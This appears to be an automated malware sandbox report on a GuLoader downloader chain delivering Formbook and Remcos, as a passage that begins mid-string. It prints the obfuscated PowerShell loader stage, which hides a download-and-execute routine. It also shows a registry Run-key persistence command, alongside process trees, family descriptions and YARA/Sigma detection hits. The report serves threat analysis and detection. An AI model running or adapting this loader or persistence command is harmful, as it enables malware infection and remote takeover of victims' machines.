S,otbKlokkaReprol Scra:VendevMondnamodtarSto ai iscoaT,nktbThornl daarep intrAlternUnboheSkarns Glu.=Uniqu$UnbeatG adur,ompluSrtrye Jet, ') ;Lovbundnes $Clamourers;Lovbundnes (Beshout 'InfraS.outttRmn naunderr Su,ptImper-J wryS.oneulStrate Abase.npicpSalg, rabl4.pise ');Lovbundnes (Beshout ' Rain$SemisgoutbulInveio,onoubFarinaCo,kelMar o:RigerNDobbeo FortnKoldboJuicecH xesc Cau iWhackd BocaeBehaanFredst,glina Oct.lSlavel P.ogyVaske1Lived7Milie2 Kend=Afpri(Eff,kTBotcheOsmans notitNonno-OverfP Amarad.vintUnconh skov Bid $ faksFTorveoHydradAars bFeltmoFuli.lFantad Pisto,pilirImpi gGen,eaLi.ninSto,ei,ncepsCommea Bj rtCafe i NordoAdmednTilsteHenvirspra,n De.oeBarun)Alter ') ;Lovbundnes (Beshout ' Stea$FirblgGlycelRaadsospindbSyc naUnapol tult:Umy,dsInd,spA logoE.sprrBetlutfersksPlas.f TraniU ilas acitkBld re .omorAce onCounteMindssSkndi=Legif$TudengL nollBr aroWeanebImpowa utorletche:BohunG Squ r recoiRenu.z Icht1 prog8 .hut0Spoof+cereb+Colum% .ril$BarghMAntr.aSku.dsBespesXenylaDitlecufuldrUnf,leUnb.odEpisc.For,rcM,casoagerduSpankn Su.etRigge ') ;$Gem=$Massacred[$sportsfiskernes];}$Sycophant=286850;$Fanhouse=29309;Lovbundnes (Beshout 'Quadr$FlunkgNonv.lDejlio BikobOutseaFolkllDe pa:SkabeBKor,te ScothSwe.eaOctarnPresadLem rlstr,jiFuppenKarstgRanglsTun,sf kop oe.iserPreanmtriun ,abat=upwra CombG.raileneddmtP.yba-Fal.oC A.buosne,nnBrutttDiss eLaparn CorntAkti. 
Outb $SinceF sonnoServidForstbOpt.goBaandlAn icdMagneoSy.aprNonp.gToposaCiaren Ochei S,nds e,tia Pantt FormiAdmonoAfklan ickseSiamerAnnlin Oliee Koll ');Lovbundnes (Beshout 'Seama$CountgCooeelJagghoS,nerb DiblaSocialTe,mo:ParceEAnvenmCrammbProreoSecresUd aaoGadetmPome Spe i=Acyli Gospe[Il.ndSHaardyButiksTeazltRingteTostimCygn,.AutofCScorpoD span ephav,jforeBedarrUitsptMarti]sp.ne:Rumpi:skndeFD,mner,olypoUdbu,m nkkB .icoaDampbsA,stieMn,mo6istem4br.epS Alrut AfsprUltraiG.dsknUnautgGendr(Reinl$ KamfB Yleteskolah Zamba,ammonAnnlidAttacl TlleiTanksn DonogFe.ins,llenfSta,lo D bbrPh,nom.awky)Vrdis ');Lovbundnes (Beshout 'unspr$Stratg SnarlUenigoAttribPrvetaDiabolIntur:BarocBExtrauFarv,l Trm.dPalaerCounteMidaitMalle Palis= Unco Atro[SkabiS amleyL,ggisTit ltMakuleV nermEskim. co nTVan,ueLungsxBastitUintj.CouteEE,ternUrbancProgro Shedd ,arii MisrnRetoagNemat]Fibro:Cup,u:ColorALu,skSSvbesCT.metIKbestIDorge.L,gerGSkif,eAfba,tBaldaSAtomkt RegirAkkomiEksamnFantagNibbl(Sju,k$Uove,EInspem.levabYulboo CreasBremsoFlammmAspha)Tro b ');Lovbundnes (Beshout 'Broth$Pippeg BesplPioneoUdsteb chooa tagnlStrop:GrangBA.grerLithoeExpatvgispeiHoerecTurk,aObstru AlbudHy roaGui,i2Rhaps=Bredb$BasepBUnderu alalNonend Solir WhizeLevirtPen.a. Forss.dminuU,idebOpkalsFdekltKredsr F,rpirvesknImpr.g,mfor(S,dni$ GendSK.areyYngstc S naoGnubbpreverhInsena CathnraaditInsen,Be,vr$ColosFHe,ira,oknenNst.ihNestloReeleut.anss Fo.eePredi) ongu ');Lovbundnes $Brevicauda2;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 2580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cmd.exe (PID: 6896 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • powershell.exe (PID: 6420 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Clamourers=Beshout ' tran$ LiniGmaskieamphinled meOph lrGlutti ,inicActivaUrinelRis,klyngliy .uto.LerkrDForkaoEme.owUnd.rn Behol Refoo PansaAtrordLge.rFesta,iRachel ColoeAd,rd( eral$,ogerGquadreHypocmTambu,Svovl$ ,symF V,mao Psykd AuspbUddeloDayfll iksedKhiraoSexfir BistgoptraaSlutrnKnoldiSplejsHippoa Venet ManniUafheo UnexnMinoreti sfrNdudgn OpmaeAp.ea)Bea,b ';$Fodboldorganisationerne=$Blafferen[0];Lovbundnes (Beshout 'Konce$EntergBeentlNonsuo FjelbSpuilaMulenlCirro: b gyN.rozaopolarnKotelokn.fic MaricB yaniSwi,ddAdditeAcadenVekset Min a Wi tl.ernelSelvsyMorai1Smrsy7 M ta2S.ill=P vot( OkseT PolyeTyr,fsImpedtCoten-PowerPTr.lda,orblt ,rdihSphac Bhmis$Se.erFSnag,oRettedLagerbUdr.goRef rlFanfadCattioSkomarDivu.g Pai,aHydronDatasi Ov rs,admoaKentatBrudliFjernoCou,tnB,ddeeBakeprKendenIndise St.m)Corne ');while (!$Nonoccidentally172) {Lovbundnes (Beshout ',runs$Skol gMicmal reado 
S,otbKlokkaReprol Scra:VendevMondnamodtarSto ai iscoaT,nktbThornl daarep intrAlternUnboheSkarns Glu.=Uniqu$UnbeatG adur,ompluSrtrye Jet, ') ;Lovbundnes $Clamourers;Lovbundnes (Beshout 'InfraS.outttRmn naunderr Su,ptImper-J wryS.oneulStrate Abase.npicpSalg, rabl4.pise ');Lovbundnes (Beshout ' Rain$SemisgoutbulInveio,onoubFarinaCo,kelMar o:RigerNDobbeo FortnKoldboJuicecH xesc Cau iWhackd BocaeBehaanFredst,glina Oct.lSlavel P.ogyVaske1Lived7Milie2 Kend=Afpri(Eff,kTBotcheOsmans notitNonno-OverfP Amarad.vintUnconh skov Bid $ faksFTorveoHydradAars bFeltmoFuli.lFantad Pisto,pilirImpi gGen,eaLi.ninSto,ei,ncepsCommea Bj rtCafe i NordoAdmednTilsteHenvirspra,n De.oeBarun)Alter ') ;Lovbundnes (Beshout ' Stea$FirblgGlycelRaadsospindbSyc naUnapol tult:Umy,dsInd,spA logoE.sprrBetlutfersksPlas.f TraniU ilas acitkBld re .omorAce onCounteMindssSkndi=Legif$TudengL nollBr aroWeanebImpowa utorletche:BohunG Squ r recoiRenu.z Icht1 prog8 .hut0Spoof+cereb+Colum% .ril$BarghMAntr.aSku.dsBespesXenylaDitlecufuldrUnf,leUnb.odEpisc.For,rcM,casoagerduSpankn Su.etRigge ') ;$Gem=$Massacred[$sportsfiskernes];}$Sycophant=286850;$Fanhouse=29309;Lovbundnes (Beshout 'Quadr$FlunkgNonv.lDejlio BikobOutseaFolkllDe pa:SkabeBKor,te ScothSwe.eaOctarnPresadLem rlstr,jiFuppenKarstgRanglsTun,sf kop oe.iserPreanmtriun ,abat=upwra CombG.raileneddmtP.yba-Fal.oC A.buosne,nnBrutttDiss eLaparn CorntAkti. 
Outb $SinceF sonnoServidForstbOpt.goBaandlAn icdMagneoSy.aprNonp.gToposaCiaren Ochei S,nds e,tia Pantt FormiAdmonoAfklan ickseSiamerAnnlin Oliee Koll ');Lovbundnes (Beshout 'Seama$CountgCooeelJagghoS,nerb DiblaSocialTe,mo:ParceEAnvenmCrammbProreoSecresUd aaoGadetmPome Spe i=Acyli Gospe[Il.ndSHaardyButiksTeazltRingteTostimCygn,.AutofCScorpoD span ephav,jforeBedarrUitsptMarti]sp.ne:Rumpi:skndeFD,mner,olypoUdbu,m nkkB .icoaDampbsA,stieMn,mo6istem4br.epS Alrut AfsprUltraiG.dsknUnautgGendr(Reinl$ KamfB Yleteskolah Zamba,ammonAnnlidAttacl TlleiTanksn DonogFe.ins,llenfSta,lo D bbrPh,nom.awky)Vrdis ');Lovbundnes (Beshout 'unspr$Stratg SnarlUenigoAttribPrvetaDiabolIntur:BarocBExtrauFarv,l Trm.dPalaerCounteMidaitMalle Palis= Unco Atro[SkabiS amleyL,ggisTit ltMakuleV nermEskim. co nTVan,ueLungsxBastitUintj.CouteEE,ternUrbancProgro Shedd ,arii MisrnRetoagNemat]Fibro:Cup,u:ColorALu,skSSvbesCT.metIKbestIDorge.L,gerGSkif,eAfba,tBaldaSAtomkt RegirAkkomiEksamnFantagNibbl(Sju,k$Uove,EInspem.levabYulboo CreasBremsoFlammmAspha)Tro b ');Lovbundnes (Beshout 'Broth$Pippeg BesplPioneoUdsteb chooa tagnlStrop:GrangBA.grerLithoeExpatvgispeiHoerecTurk,aObstru AlbudHy roaGui,i2Rhaps=Bredb$BasepBUnderu alalNonend Solir WhizeLevirtPen.a. Forss.dminuU,idebOpkalsFdekltKredsr F,rpirvesknImpr.g,mfor(S,dni$ GendSK.areyYngstc S naoGnubbpreverhInsena CathnraaditInsen,Be,vr$ColosFHe,ira,oknenNst.ihNestloReeleut.anss Fo.eePredi) ongu ');Lovbundnes $Brevicauda2;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • cmd.exe (PID: 5144 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • wab.exe (PID: 5276 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
                • wab.exe (PID: 3640 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
                  • sofUaEnRVTAexkDmTx.exe (PID: 6828 cmdline: "C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                    • clip.exe (PID: 5896 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
                      • sofUaEnRVTAexkDmTx.exe (PID: 6928 cmdline: "C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                      • firefox.exe (PID: 2264 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • dllhost.exe (PID: 7140 cmdline: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • wab.exe (PID: 6956 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 7116 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wab.exe (PID: 4788 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
Name: Formbook (alias: Formbo)
Description: FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
Attribution:
  • SWEED
  • Cobalt
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name: CloudEyE (alias: GuLoader)
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Remcos (alias: RemcosRAT)
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
Source: C:\Users\user\AppData\Roaming\jiourhjs.dat | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security

Source: 00000006.00000002.2508655115.00000000085D0000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_5 | Description: Yara detected GuLoader | Author: Joe Security
Source: 0000001E.00000002.3417567901.0000000000EF0000.00000040.80000000.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 0000001E.00000002.3417567901.0000000000EF0000.00000040.80000000.00040000.00000000.sdmp | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  • 0x345fd:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1db9c:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 0000001B.00000002.3098127241.0000000003000000.00000040.10000000.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 0000001B.00000002.3098127241.0000000003000000.00000040.10000000.00040000.00000000.sdmp | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  • 0x2a540:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13adf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
(28 further memory-match entries not shown)

Source: amsi64_2084.amsi.csv | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: amsi32_4972.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
  • 0xe1f8:$b2: ::FromBase64String(
  • 0xd2c5:$s1: -join
  • 0x6a71:$s4: +=
  • 0x6b33:$s4: +=
  • 0xad5a:$s4: +=
  • 0xce77:$s4: +=
  • 0xd161:$s4: +=
  • 0xd2a7:$s4: +=
  • 0x175ce:$s4: +=
  • 0x1764e:$s4: +=
  • 0x17714:$s4: +=
  • 0x17794:$s4: +=
  • 0x1796a:$s4: +=
  • 0x179ee:$s4: +=
  • 0xdaa0:$e4: Get-WmiObject
  • 0xdc8f:$e4: Get-Process
  • 0xdce7:$e4: Start-Process
  • 0x160ea:$e4: Get-Process
Source: amsi32_504.amsi.csv | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: amsi32_6420.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
  • 0xaa35:$b2: ::FromBase64String(
  • 0x9ae8:$s1: -join
  • 0x3294:$s4: +=
  • 0x3356:$s4: +=
  • 0x757d:$s4: +=
  • 0x969a:$s4: +=
  • 0x9984:$s4: +=
  • 0x9aca:$s4: +=
  • 0x13b9a:$s4: +=
  • 0x13c1a:$s4: +=
  • 0x13ce0:$s4: +=
  • 0x13d60:$s4: +=
  • 0x13f36:$s4: +=
  • 0x13fba:$s4: +=
  • 0xa2cc:$e4: Get-WmiObject
  • 0xa4bb:$e4: Get-Process
  • 0xa513:$e4: Start-Process
  • 0x126b4:$e4: Get-Process

              System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7108, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , ProcessId: 2144, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7108, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , ProcessId: 2144, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7108, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , ProcessId: 2144, ProcessName: wscript.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7108, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)", ProcessId: 6548, ProcessName: cmd.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: %Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5028, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Argumentlistens
Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6548, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)", ProcessId: 5028, ProcessName: reg.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7108, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)", ProcessId: 6548, ProcessName: cmd.exe
Source: Registry Key set | Author: frack113, Florian Roth (Nextron Systems) | Data: Details: %Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5028, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Argumentlistens
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7108, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , ProcessId: 2144, ProcessName: wscript.exe
